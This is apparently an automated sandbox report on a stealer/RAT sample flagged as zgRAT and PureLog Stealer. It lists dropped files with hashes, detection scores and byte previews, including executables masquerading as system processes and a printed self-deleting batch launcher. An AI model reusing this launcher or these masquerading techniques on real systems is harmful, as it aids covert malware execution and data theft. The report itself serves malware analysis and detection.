                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Joe Sandbox View:
                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

                                                              C:\Recovery\conhost.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\Recovery\dllhost.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

                                                              C:\Recovery\dllhost.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XNPOazHpXF.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1698
                                                              Entropy (8bit):5.367720686892084
                                                              Encrypted:false
                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                              MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                              SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                              SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                              SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                              Malicious:true
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                              C:\Users\user\AppData\Local\Temp\00RAx5LJzk

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\06nGIu3U5O

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\0C2uN2Oibj

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\0ChjUrjO31

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\0FVrr8WmCN

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\0KCYxDrEyP

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\0c2boWRJur

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\0rcf36aSkK

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\12sj6ecln1

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\19J3ZTSSLl

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\1Kp1nmjwH6

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\1LI40zC358

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):168
                                                              Entropy (8bit):5.174464547122643
                                                              Encrypted:false
                                                              SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVqdei5zNHovBktKcKZG1Ukh4E2J5xAI2A/xq:hCRLuVFOOr+DEAdF5zVovKOZG1923fXE
                                                              MD5:BD30DFCA97C0C3CF30FEDEED74C2022D
                                                              SHA1:AA4EFFE7AA4F514607124B1D519E2F5728F4D357
                                                              SHA-256:F9F1EF84D249AA9992F222DDFFEB037FBAF4DE43C97F74D93DAAEFFB02DFE33D
                                                              SHA-512:3243406478DFA98FEC7AD2AF26EE923BD6FD04CA8155F76FE5AE4A4FE53217F621959E02F3A7378DDF20BBCB7827ECE7BD0D884A2C68C036992A0C4898929E05
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\InputMethod\CHT\services.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1kuSaYZZpb.bat"

                                                              C:\Users\user\AppData\Local\Temp\1xdpuai86K

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\22EXvE01eK

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\29gH5WcuxY

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2HtjdOqwI8

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2UWdOcTuBr

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2qHAeASJN9

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
